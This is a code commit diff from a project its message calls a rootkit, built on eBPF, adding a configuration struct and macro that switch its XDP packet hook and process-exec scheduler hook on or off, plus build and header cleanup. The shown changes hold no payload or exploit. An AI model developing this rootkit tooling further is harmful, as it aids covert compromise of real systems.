Included a global config struct for controlling which hooks and functions of the rootkit should be active. Still work to be done in the bpf side

.vscode/settings.json

@@ -4,6 +4,10 @@
         "constants.h": "c",
         "pkt_cls.h": "c",
         "map_defs.h": "c",
-        "regex.h": "c"
+        "regex.h": "c",
+        "unistd.h": "c",
+        "xdp_filter.h": "c",
+        "module_manager.h": "c",
+        "modules.h": "c"
     }
 }

src/Makefile

@@ -5,7 +5,7 @@ LLVM_STRIP ?= llvm-strip
 BPFTOOL ?= $(abspath ./tools/bpftool)
 LIBBPF_SRC := $(abspath ./libbpf/src)
 LIBBPF_OBJ := $(abspath $(OUTPUT)/libbpf.a)
-USER_INCLUDES_DIR := $(abspath ./user/include/utils)
+USER_INCLUDES_DIR := $(abspath ./user/include/)
 USER_INCLUDES_HDR := $(wildcard $(USER_INCLUDES_DIR)/**/*.h)
 USER_INCLUDES_SRC := $(wildcard $(USER_INCLUDES_DIR)/**/*.c)
 USER_INCLUDES_OBJ := $(USER_INCLUDES_SRC:.c=.o) 

src/ebpf/include/utils/modules.h

@@ -0,0 +1,14 @@
+#ifndef __MODULES_H
+#define __MODULES_H
+
+#define RETURN_VALUE_MODULE_NONACTIVE -1
+//Access user-defined config
+#include "../../user/include/modules/module_manager.h"
+
+
+#define CHECK_MODULE_ACTIVE(module, func)\
+    if( module_config. module##_module.all != ON){\
+        return RETURN_VALUE_MODULE_NONACTIVE;\
+    }
+
+#endif

src/ebpf/include/utils/strings.h

@@ -1,5 +1,5 @@
-#ifndef __COMMON_UTILS_H__
+#ifndef __UTILS_STRINGS_H__
-#define __COMMON_UTILS_H__
+#define __UTILS_STRINGS_H__
 
 /**
 * Compares two strings.

src/ebpf/xdp_filter.bpf.c

@@ -29,10 +29,11 @@
 #include "packet/packet_manager.h"
 #include "packet/protocol/tcp_helper.h"
 #include "xdp/xdp_helper.h"
-#include "common/common_utils.h"
+#include "utils/strings.h"
 
 //BPF modules to load
-#include "include/bpf/fs.h"
+#include "include/utils/modules.h" //Config
+#include "include/bpf/sched.h"
 
 char LICENSE[] SEC("license") = "Dual BSD/GPL";
 
@@ -45,8 +46,8 @@ struct eth_hdr {
 
 
 SEC("xdp_prog")
-int xdp_receive(struct xdp_md *ctx)
+int xdp_receive(struct xdp_md *ctx){
-{
+    CHECK_MODULE_ACTIVE(xdp, __FUNCTION__);
     //bpf_printk("BPF triggered\n");
     
     void *data_end = (void *)(long)ctx->data_end;

src/user/include/modules/module_manager.c

@@ -0,0 +1,12 @@
+#include "module_manager.h"
+
+module_config_t module_config = {
+    .xdp_module = {
+        .all = ON,
+        .xdp_receive = ON
+    },
+    .sched_module = {
+        .all = ON,
+        .handle_sched_process_exec = ON
+    }
+};

src/user/include/modules/module_manager.h

@@ -1,10 +1,25 @@
 #ifndef __MOD_MANAGER_H
 #define __MOD_MANAGER_H
 
-#include <unistd.h>
+#include <stdint.h>
 
-struct module_config{
+#define ON 1
-    //TODO
+#define OFF 0
-};
+
+//Centralized configutation struct
+typedef struct module_config_t{
+    struct xdp_module {
+        char all;
+        char xdp_receive;
+    } xdp_module;
+
+    struct sched_module {
+        char all;
+        char handle_sched_process_exec;
+    }sched_module;
+
+} module_config_t;
+
+extern module_config_t module_config;
 
 #endif

src/user/xdp_filter.c

@@ -7,6 +7,7 @@
 #include <linux/if_link.h>
 #include <net/if.h>
 #include <unistd.h>
+
 #include <bpf/bpf.h>
 
 #include "xdp_filter.skel.h"
@@ -23,6 +24,7 @@ static struct env {
 } env;
 
 void print_help_dialog(const char* arg){
+	
     printf("\nUsage: %s ./xdp_filter OPTION\n\n", arg);
     printf("Program OPTIONs\n");
     char* line = "-t[NETWORK INTERFACE]";